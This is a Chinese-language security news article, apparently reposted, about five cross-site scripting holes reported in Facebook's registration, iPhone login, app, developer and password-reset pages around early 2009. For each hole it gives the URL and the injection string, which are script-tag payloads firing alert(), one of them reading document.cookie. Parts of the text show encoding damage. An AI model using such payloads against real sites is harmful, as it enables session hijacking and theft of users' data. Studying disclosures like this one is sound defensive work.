近期，F(xiàn)acebook驚現(xiàn)高危XSS安全漏洞，致使其用戶遭受巨大威脅。本文將對這些漏洞發(fā)布進行詳細介紹。
Facebook在2008年12月15日與2009年1月4日被曝出一系列高危XSS安全漏洞，F(xiàn)acebook眾多的功能同時遭受牽連，如新用戶注冊、iPhone登錄、密碼重新設(shè)定，等等。

攻擊者能夠利用這些XSS漏洞攻擊數(shù)以百萬計的Facebook用戶，例如散播惡意軟件、廣告軟件和間諜軟件等等。拜這些高�？缯军c腳本攻擊漏洞所賜，F(xiàn)acebook用戶可能受到釣魚攻擊并導(dǎo)致ID失竊。截至本月5號為止，這些漏洞尚未得到修復(fù)，這些高危漏洞已經(jīng)對用戶的隱私構(gòu)成了高度的威脅。

安全研究人員最近發(fā)現(xiàn)的有XSS漏洞的頁面包括，開發(fā)人員頁面、新用戶注冊頁面、iphone登錄頁面以及應(yīng)用程序頁面。攻擊者能夠利用這些XSS漏洞攻擊數(shù)以百萬計的Facebook用戶，例如散播惡意軟件、廣告軟件和間諜軟件等等。對于用戶來說，為了遠離這些威脅的攻擊最好不要接受不認識的人員加為好友的請求，千萬不要點擊不明來源的鏈接。

原因是Facebook的個人概況中包含了許多個人信息，“好友”通過則這些信息足以發(fā)動有針對性的釣魚攻擊，或者向您發(fā)送有針對性的垃圾郵件。但是如果您點擊了一個共享鏈接結(jié)果會怎樣呢？很明顯，對他們來說，您就不會有什么隱私了�。。�為了安全和隱私起見，一定要注意您在社交網(wǎng)絡(luò)上的個人簡介。

下面我們對這些最新漏洞分析進行介紹：

1號XSS漏洞：

所在位置：http://www.new.facebook.com/r.php
問題頁面的鏡像：http://www.xssed.com/mirror/50947/
攻擊性POST：reg_email__="onmouseover="alert('XSS - ZJ')"foo="bar

2號XSS漏洞

所在位置：
https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F
問題頁面的鏡像：http://www.xssed.com/mirror/53885/
攻擊性POST：
email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

3號XSS漏洞

所在位置及攻擊字符串：
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E
問題頁面的鏡像：http://www.xssed.com/mirror/55268/

4號XSS漏洞：

所在位置：http://developers.facebook.com/tools.php?fbml
問題頁面的鏡像：http://www.xssed.com/mirror/55392/
攻擊性POST：
profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=
Hey you all! Our best wishes for 2009!!! :) ;)

5號XSS漏洞：

這是Facebook的Reset Password頁面近期再次出現(xiàn)危險的跨站點腳本攻擊安全漏洞。惡意用戶可以網(wǎng)其中諸如代碼并竊取數(shù)以百萬計的Facebook用戶的敏感個人信息。但愿這個漏洞能夠得到迅速修復(fù)，好在以前他們的反應(yīng)還是很迅速的。

所在位置：
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

問題頁面的鏡像：
http://www.xssed.com/mirror/55951/

快照：

 
圖1

標簽： seo 安全 代碼 腳本 漏洞 網(wǎng)絡(luò)

版權(quán)申明：本站文章部分自網(wǎng)絡(luò)，如有侵權(quán)，請聯(lián)系：west999com@outlook.com
特別注意：本站所有轉(zhuǎn)載文章言論不代表本站觀點！
本站所提供的圖片等素材，版權(quán)歸原作者所有，如需使用，請與原作者聯(lián)系。